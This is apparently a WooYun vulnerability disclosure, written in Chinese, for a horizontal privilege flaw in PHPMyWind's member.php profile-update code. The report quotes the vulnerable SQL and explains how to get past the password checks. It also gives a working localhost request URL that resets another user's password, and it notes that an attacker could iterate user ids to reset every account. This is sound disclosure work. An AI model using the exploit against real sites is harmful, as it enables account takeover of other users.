WooYun.org

经过简单审核发现phpmywind 存在一处任意用户资料更新漏洞(包括密码)
因为phpmywind的密码采用双md5加密,即使存在注入，也很难跑出密码，所以感觉注入漏洞危害性还不如密码重置这类的漏洞，这里我就验证下密码重置这个漏洞，其实是可以修改任意用户的所有资料信息。
出现逻辑问题的代码位于member.php的第601行，上下文分别是
//更新资料
elseif($a == 'saveedit')
{

//检测数据完整性
if($password!=$repassword or$email=='')
{
header('location:?c=edit');
exit();
}


//HTML转义变量
$answer = htmlspecialchars($answer);
$cnname = htmlspecialchars($cnname);
$enname = htmlspecialchars($enname);
$cardnum = htmlspecialchars($cardnum);
$intro = htmlspecialchars($intro);
$email = htmlspecialchars($email);
$qqnum = htmlspecialchars($qqnum);
$mobile = htmlspecialchars($mobile);
$telephone =htmlspecialchars($telephone);
$address = htmlspecialchars($address);
$zipcode = htmlspecialchars($zipcode);


//检测旧密码是否正确
if($password != '')
{
$oldpassword =md5(md5($oldpassword));
$r =$dosql->GetOne("SELECT `password` FROM `#@__member` WHERE`username`='$c_uname'");
if($r['password'] !=$oldpassword)
{
ShowMsg('抱歉，旧密码错误！','-1');
exit();
}
}

$sql = "UPDATE `#@__member` SET";
if($password != '')
{
$password =md5(md5($password));
$sql .="password='$password', ";
}
@$sql .= "question='$question',answer='$answer', cnname='$cnname', enname='$enname', sex='$sex',birthtype='$birthtype', birth_year='$birth_year', birth_month='$birth_month',birth_day='$birth_day', astro='$astro', bloodtype='$bloodtype', trade='$trade',live_prov='$live_prov', live_city='$live_city', live_country='$live_country',home_prov='$home_prov', home_city='$home_city', home_country='$home_country',cardtype='$cardtype', cardnum='$cardnum', intro='$intro', email='$email',qqnum='$qqnum', mobile='$mobile', telephone='$telephone',address_prov='$address_prov', address_city='$address_city', address_country='$address_country',address='$address', zipcode='$zipcode' WHERE id=$id";
//可修改任意用户资料
if($dosql->ExecNoneQuery($sql))
{
ShowMsg('资料更新成功！','?c=edit');
exit();
}
}
这段代码的功能是更新用户资料（包含密码）
问题的关键点在执行sql语句
@$sql.= "question='$question', answer='$answer', cnname='$cnname',enname='$enname', sex='$sex', birthtype='$birthtype', birth_year='$birth_year',birth_month='$birth_month', birth_day='$birth_day', astro='$astro',bloodtype='$bloodtype', trade='$trade', live_prov='$live_prov',live_city='$live_city', live_country='$live_country', home_prov='$home_prov',home_city='$home_city', home_country='$home_country', cardtype='$cardtype',cardnum='$cardnum', intro='$intro', email='$email', qqnum='$qqnum',mobile='$mobile', telephone='$telephone', address_prov='$address_prov',address_city='$address_city', address_country='$address_country',address='$address', zipcode='$zipcode' WHERE id=$id";
的执行判断条件上，where后的id是可以通过参数进行修改的，而之后没有其他验证条件，导致了水平权限的问题。
触发这条SQL语句需要绕过前面的一些验证
if($password!=$repasswordor $email=='')
{
header('location:?c=edit');
exit();
}
只要在url中带入password,repassword,email 使不为空,让password=repassword就可以，这个password就是重置后的密码
//检测旧密码是否正确
if($password != '')
{
$oldpassword =md5(md5($oldpassword));
$r = $dosql->GetOne("SELECT`password` FROM `#@__member` WHERE `username`='$c_uname'");
if($r['password'] !=$oldpassword)
{
ShowMsg('抱歉，旧密码错误！','-1');
exit();
}
}
这个地方也很好绕过，注册个账号，在url中填入c_uname为注册的账号，oldpassword为注册的密码就可以。

以上就是绕过的方法，然后就可以任意设置id修改任意用户的密码，当然想要修改资料的话通过在url中添加
$answer = htmlspecialchars($answer);
$cnname = htmlspecialchars($cnname);
$enname = htmlspecialchars($enname);
$cardnum = htmlspecialchars($cardnum);
$intro = htmlspecialchars($intro);
$email = htmlspecialchars($email);
$qqnum = htmlspecialchars($qqnum);
$mobile = htmlspecialchars($mobile);
$telephone =htmlspecialchars($telephone);
$address = htmlspecialchars($address);
$zipcode = htmlspecialchars($zipcode);
这些对应的变量就可以。
验证一下吧

我首先注册了两个用户listen1 和listen2 密码都是listen
尝试用listen1修改listen2的密码为123456
登陆listen1,构造请求发送
http://127.0.0.1/phpmywind/member.php?a=saveedit&c_uname=listen1&oldpassword=listen&password=123456&id=4&repassword=123456&email=123

listen2用户的id是4，这个无关紧要，对于一个攻击者，他宁愿通过遍历把所有用户密码修改掉。
发送链接

OK
修改成功！
经测试listen2密码确实被修改为123456
你们可以自行验证，有问题联系[email protected]